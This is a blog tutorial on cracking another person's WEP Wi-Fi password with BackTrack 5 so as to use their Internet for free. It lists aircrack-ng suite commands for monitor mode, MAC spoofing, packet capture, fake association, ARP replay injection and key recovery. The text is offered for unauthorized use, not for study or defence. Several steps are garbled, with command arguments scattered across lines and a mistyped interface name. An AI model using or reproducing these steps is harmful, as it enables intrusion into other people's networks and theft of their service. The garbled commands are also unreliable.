How to hack wi-fi password using backtrack5

Using Backtrack 5 you can hack someone else WiFi passwords easily,and use Internet for freeHow to hack wi-fi password using backtrack5

                                              what  you need

1 -A compatible wireless adapter : A wireless adapter that's capable of packet injection
2 -BackTrack 5 - Installed or Live DVD,Both will work.

If you’re using Kali in VMware, then you might have  to     connect the card via the icon in the device menu. 


step1.Disconnect from all wireless networks, open a Terminal, and type airmon-ng
It will show all the wireless cards that support monitor  mode.

 now follow these steps and  Type the following commands
2. airmon-ng stop wifi0

3.ifconfig wifi0 down

4.macchanger --mac 00:11:22:33:44:66 wifi0

5.airmon-ng start wifi0

6.airodump-ng wifi0
It will start searching Wifi networks. Press Ctrl + C to stop.
Check the network with WEP.
 Now do one thing also cpoy all the BSSID, CH and ESSID  in notepad 
Note that if the same BSSID is available in the second part with STATION associated with it,
means you some one is accessing that network and our task will be little easier to hack.otherwise don't worry about it follow blew steps: 


7. airodump-ng -c (channel) -w (file name)
Replace
(channel) with the CH which u had already n
(file name) with any name of your choice
(bssid) with the BSSID which u had already note
--bssid (bssid) wifi0
Note it
Leave this console as it is and start new terminal

8. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0
If you don’t get Association Successful mesage then keep on trying until
you got success.

9. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0
Well if you don’t see ARP ACK and sent packets are not increasing or still 0 
than it means no 1 is
accessing that network.But don’t worry you go an optional step,
Leave this terminal as it is and start new k

10.aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF
konsole
message than keep on trying until you get success
got an optional step
terminal
–b (bssid) –h 00:11:22:33:44:66 wfi0
Press y and enter
Now you will see that ARP and ACK packets in 2nd console are increasing fast
Keep this terminal as it is and start 4th terminal.

11.aircrack-ng -b (bssid) (filename)-
Just wait and watch…..Backtrack will do rest of the work.

enjoy........................................................................................................................................

1 comment: Leave Your Comments

  1. Here Is A Colletion Of Huge Programs, Download Free Software, Books,Project Etc.
    You Also Can Learn C, C++, Java ,ASP.Net And Blog & Website Designing
    http://www.programmingwithbasics.com

    ReplyDelete

Blogger Tips and TricksLatest Tips For BloggersBlogger Tricks